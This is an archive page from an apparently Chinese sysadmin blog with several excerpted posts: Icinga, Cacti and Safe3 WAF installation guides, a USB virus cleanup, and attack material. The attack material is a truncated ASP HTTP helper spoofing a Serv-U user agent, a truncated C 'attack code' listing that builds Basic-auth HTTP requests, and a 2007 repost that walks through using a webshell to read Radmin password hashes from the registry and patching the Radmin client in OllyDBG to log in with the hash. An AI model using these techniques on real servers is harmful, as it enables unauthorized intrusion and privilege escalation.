<style type="text/css">
 <!--
 body,td,th {
 font-size: 12px;
 }
 -->
 </style>
 <%
 Function httpopen(neirong,fangshi,dizhi,refer,cookie)
 set Http=server.createobject("Microsoft.XMLHTTP")
 Http.open fangshi,dizhi,false
 Http.setrequestheader "Referer",refer
 Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
 Http.setrequestheader "Content-length",len(neirong)
 Http.setrequestheader "User-Agent","Serv-U"
 Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
 If cookie<>"" then
 Http.setrequestheader "Cookie",cookie
 End If
 Http.send neirong
 httpopen=bytes2BSTR(Http.responseBody)
 set Http=nothing
 end Function
Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”"
End If
end Function

(更多…)

二月 2nd, 2012

Posted In: 网络技术

标签:

攻击代码如下:

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <netdb.h>

#include <netinet/in.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <getopt.h>

#define PORT 80

#define SA struct sockaddr

char header[] =

“GET /%s/ HTTP/1.1rn”

“Host: %srn”

“User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1rn”

“Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn”

“Accept-Language: pl,en-us;q=0.7,en;q=0.3rn”

“Accept-Encoding: gzip, deflatern”

“Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn”

“Proxy-Connection: keep-alivern”

“Authorization: Basic “;

  (更多…)

十二月 27th, 2011

Posted In: 网络技术

icinga是nagios升级版,其开发人员全部为nagios原小组成员,其绝对免费,在nagios基础上进行二次开发,优化一些文件,其nagios原配置文件直接无缝对接,其安装配置方法如下

中文项目地址

http://icinga-cn.sourceforge.net/

安装基础依赖

yum install libdbi-devel libdbi libdbi-drivers libdbi-dbd-mysql

新增用户组及用户

groupadd www
useradd -g www www

wget http://jaist.dl.sourceforge.net/project/icinga-cn/icinga-cn/icinga-cn-1.5.1/icinga-cn-1.5.1.tar.bz2
tar jxvf icinga-cn-1.5.1.tar.bz2
cd icinga-cn-1.5.1
./configure –prefix=/usr/local/icinga –enable-idoutils –enable-embedded-perl –enable-ssl –with-icinga-user=www –with-icinga-group=www –with-command-user=www –with-command-group=www –with-web-user=www –with-web-group=www –with-httpd-conf=/etc/httpd/conf/conf.d
make all
make install
make install-init
make install-commandmode
make install-idoutils
make install-api
make install-config
make install-webconf

安装nagios插件

tar zxvf nagios-plugins-1.4.15.tar.gz
cd nagios-plugins-1.4.15/
./configure –prefix=/usr/local/icinga –with-cgiurl=/icinga/cgi-bin –with-htmurl=/www –with-nagios-user=www –with-nagios-group=www
make && make install

安装nrpe

tar zxvf icinga-nrpe-HEAD.tar.gz
cd icinga-nrpe
./configure –with-nrpe-user=www –with-nrpe-group=www –with-icinga-user=www –with-icinga-group=www
make
make install

拷贝nrpe文件:

cp src/nrpe /usr/local/icinga/bin
cp sample-config/nrpe.cfg /usr/local/icinga/etc

启动nrpe病检查:

/usr/local/icinga/bin/nrpe -n -c /usr/local/icinga/etc/nrpe.cfg -d
/usr/local/icinga/libexec/check_nrpe -H 127.0.0.1 -n

默认其icinga用户名
user:icingaadmin
pass:admin
如修改密码则使用
htpasswd -c /usr/local/icinga/etc/htpasswd.users icingaadmin

如修改用户名,则须修改cgi.cfg文件,将里面的icingaadm修改为你修改的用户,否则无权限查看主机服务

在其它客户机安装nrpe及nagios插件即可,nrpe配置文件允许监控主机进行数据采集

在客户机安装完成插件及nrpe后,可从服务端向客户端进行连接测试

usr/local/icinga/libexec/check_nrpe -H 192.168.1.128 -c check_load
OK – load average: 0.16, 0.14, 0.06|load1=0.160;1.500;3.000;0; load5=0.140;1.100;2.200;0; load15=0.060;0.900;1.900;0;

如测试硬盘空间check_disk或swap交换分区check_swap等,最后界面如下

icinga.jpg

十一月 7th, 2011

Posted In: 网络技术

你是否因为自己的服务器被注入可是入侵,常让你忙的手忙脚乱,以下方法可以解决你所遇到的问题,感谢开源的强大
主要功能:
黑客防御
Safe3 WEB应用防火墙基于WEB入侵异常检测技术,对WEB应用实施全面、深度防御,能够有效识别、阻止日益盛行的WEB应用黑客攻击(如SQL注入、钓鱼攻击、表单绕过、缓冲区溢出、CGI扫描、目录遍历等):
SQL注入 命令注入 Cookie 注入 脚本(XSS、CSRF) 敏感信息泄露 恶意代码 错误配置 目录遍历 会话劫持 文件包含 缓冲区溢出 应用层拒绝服务 漏洞扫描攻击 智能学习功能
通过智能学习防御最新0day攻击。
web应用加速
系统内嵌应用加速模块,通过对各类静、动态页面及部分脚本的高速内存缓存,大大提高访问速度。
敏感信息泄露防护
系统内置安全防护策略,可以灵活定义HTTP/HTTPS错误返回的默认页面,避免因为WEB服务异常,导致敏感信息(如:WEB应用安装目录、WEB服务器版本信息等)的泄露。
网页防篡改
系统提供网页防篡改功能,通过实时检测和保护机制,确保被篡改内容不被访问者浏览到。
负载均衡
系统内置负载均衡模块,实现多网站网站服务器的均衡访问。
访问日志审计
提供WEB应用访问的日志记录、分析、统计管理等。
策略配置
提供自定义安全策略配置,适应各种应用环境。
告警
实时告警,支持邮件、短信等多种方式告警。
系统报表
支持自定义统计,报表支持各类导出格式(WORD、EXCEL、PDF、HTML等)。
本版为原版精简版,功能如下
1.拦截GET sql注入
2.拦截Cookie sql注入
3.拦截XSS跨站攻击
4.拦截web溢出攻击
5.拦截非法http请求方法攻击
6.web负载均衡功能
7.网页压缩节省带宽功能
8.Web加速功能

下载地址:http://www.safe3.com.cn/safe3waf-2.3.zip
1、安装步骤:

(系统要求:Linux 2.6+ 内核,本文中的Linux操作系统为CentOS 5.5)
tar zxvf safe3waf-2.3.tar.gz
cd safe3waf-2.3
make install //默认安装到/usr/local/safe3waf/目录,可自行修改Makefile里面的安装路径

2、修改配置文件

vi /usr/local/safe3waf/etc/safe3waf.conf
webserver 192.168.2.171 80 这段改成要保护的网站的地址,可以添加多个该段做负载均衡
 

3、启动Safe3waf

ulimit -SHn 65535

/usr/local/safe3waf/bin/safe3waf.sh start

4、配置开机自启动

vi /etc/rc.local
在末尾增加以下内容:

引用
ulimit -SHn 65535

/usr/local/safe3waf/bin/safe3waf.sh start
5、优化linux内核参数

/usr/local/safe3waf/bin/optimiz_kernel.sh

十二月 22nd, 2010

Posted In: 网络技术

昨天帮一朋友弄一台电脑,一下子让他移动硬盘的病毒文件感染了我的电脑,所以有文件全部被感染,手工清理病毒用了30分钟,后来找到网上一哥们写的软件,在此表示感谢,成功将电脑恢复

先来看看这个NB的病毒是什么样的

每个文件夹的类型变成了VBS类型,在地址栏里面了多了一个876685593.vbs的路径,只要双击电脑任何文件都会激活病毒

每个盘下面都有autorun.inf的启动文件
先手动在DOS下面清除autorun.inf双击分区不激活病毒
attrib autorun.inf -a -h -s -r
del autorun.inf

这个时候了还要结束病毒进程,此病毒进程了svchost.exe,不过最好加以分析,别结束错了进程
然后就可以在DOS下面查看文件并恢复就可以了
进程文件是c:windowssystemsvchost.exe
删除此文件即可
以下是工具清除

以下为病毒清理软件
点击下载此文件

三月 8th, 2010

Posted In: 网络技术

本文编译环境
centos 5.3
所需软件
nginx
Php
Php-mysql
Php-snmp
Mysql
Perl-DBD-MySQL
Php-pdo
rrdtool
Net-snmp
Net-snmp-libs
Net-snmp-utils
#下载相关软件
cd /wanghui/voilet/
wget http://www.cacti.net/downloads/cacti-0.8.7e.tar.gz

[code]
yum install php php-mysql php-snmp mysql mysql-server net-snmp net-snmp-libs net-snmp-utils php-pdo perl-DBD-MySQ
[/code]

在主监控机上安装rrdtool,rrdtool依赖的包过多,所以选择增加源,然后用yum安装
#增加源
[code]vi /etc/yum.repos.d/CentOS-Base.repo
[/code]
在文件末尾增加以下部分
[code]
[dag]
name=Dag RPM Repository for Red Hat Enterprise Linux
baseurl=http://apt.sw.be/redhat/el$releasever/en/$basearch/dag
gpgcheck=1
gpgkey=http://dag.wieers.com/rpm/packages/RPM-GPG-KEY.dag.txt
enabled=1
yum install rrdtool
[/code]

配置snmp
[code]
vi /etc/snmp/snmpd.conf
[/code]
#将下边这行中的default
[code]
com2secnotConfigUser default public
[/code]
#改为127.0.0.1
[code]com2secnotConfigUser 127.0.0.1 public
[/code]
#将下边这行中的systemview
[code]access notConfigGroup "" any noauth exact systemview none none
[/code]
#改为all
[code]access notConfigGroup "" any noauth exact all none none
[/code]#将下边这行的注释“#”号去掉
[code]#view all included .1 80
[/code]#重启snmpd服务
service snmpd restart

解压cacti
[code]
tar xvf cacti-0.8.7e.tar.gz
mv cacti-0.8.7e /voilet/htdocs/www/html/cacti
[/code]
在数据库中建库、授权、导入数据库结构
#注意导入cacti.sql时该文件的路径
[code]
mysql -p
mysql> create database cacti;
mysql> source /var/www/html/cacti/cacti.sql;
[/code]

配置cacti以连接数据库
vi /voilet/htdocs/www/html/cacti/include/config.php

用浏览器打开 http://192.168.11.3/cacti ,会显示 cacti的安装指南,设置好就不会再出现了。

#Cacti 默认的用户名与密码是 admin,输入用户名与密码,点击 login
#为了安全的原因,第一次登录成功后,cacti 会强制要求你更改一个新的 password ,输入新密码并确认密码,点击 save ,进入 cacti 控制台界面:
#点击 graphs ,查看cacti 监控本机的图表

增加入一个计划任务,使得 cacti 每五分钟生成一个监控图表。
crontab -e
加入如下内容。注意poller.php的路径
*/5 * * * * php /voilet/htdocs/www/html/cacti/poller.php > /dev/null 2>&1

安装完成界面

二月 25th, 2010

Posted In: 网络技术

Radmin 是一款很不错的服务器管理
无论是 远程桌面控制 还是 文件传输
速度都很快 很方便
这样也形成了 很多服务器都装了 radmin这样的
现在你说 4899默认端口 没密码的 服务器你上哪找?
大家都知道radmin的密码都是32位md5加密后
存放在注册表里的
具体的表键值为 HKLMSYSTEMRAdminv2.0ServerParameters

那在攻陷一台web服务器时 大家 怎么能进一步提权?
如果你说 暴力破解 radmin 密码 呵呵 那也行
只不过 你要有足够的时间 跟精力
我想很少人 花上几星期 几月 甚至几年 去破解那个密码

呵呵 本人最近在朋友哪得到一资料
就是如何 不需要破解 Radmin的密码 就可以进入服务武器
这就叫 密码欺骗 具体是哪位牛人发现 我也不认识 呵呵
只是 我用这个思路 搞定了好多台服务器 哈哈
想知道如何实现吗? 往下看吧
前提条件:
一个webshell 最好有读取注册表的权限
如果不能读取radmin注册表至少wscript.shell组件没删 这样我们可以调用cmd
导出radmin的表值
radmin的注册表值 也就是经过加密的MD5 hash值 是32位哦
比如 radmin的注册表里 密码是这样存放的
port 端口
Parameter REG_BINARY 1f 19 8c dd ** ** ** ** ** **有16组 每组两个 合起来 就是32位了

工具 :
radmin 控制端
OllyDBG反汇编

首先 先用OllyDBG打开 radmin控制端(客户端)
然后执行 ctrl+f 搜索 JMP EAX
然后按一下F4 再按F8
然后再 右键-查找-所有常量
输入 10325476 (很好记的 反过来就是76543210)
在弹出的窗口中 选择第一行 F2下断
然后F9 运行
这时 你就用radmin连接 你要入侵的服务器
这时 会弹出 叫你输入密码的提示框 不用管 随便输入密码
等你输入完 后 OD也就激活了

这时 你要先运行下Ctrl+F9 再往上几行 选中红色的那块 就是刚才下断的地方
再次 按F2 一下 取消断点 然后再按 F8 这时 鼠标往下走 找到
ADD ES,18 这里 按一下F4
这时 你在左下角的 hex 那里 随便找个地方点一下
然后 运行Ctrl+G 在弹出的栏里 输入 [esp] 注意带大括号的
然后 就注意把第一行 复制替换成 刚才我们得到的radmin密码的hash值
后按F9 运行看看 哈哈 是不是 搞定拉
这个方法 局限性很小 一般 的webshell都能 查看radmin的注册表
或者利用wscript.shell 导出radmin的密码 就可以进行欺骗了
比起 你暴力破解 不知道要省多少倍……

令我觉得惊讶的就是OD除了能破解软件以外,还能有这方面用途。

文章转自:http://www.lcocn.com/read.php?tid=3366&fpage=0&toread=&page=1
动画地址:http://www.hack58.net/Soft/html/13/25/2007/2007082211234.htm

九月 13th, 2007

Posted In: 网络技术

« 上一页

无觅相关文章插件,快速提升流量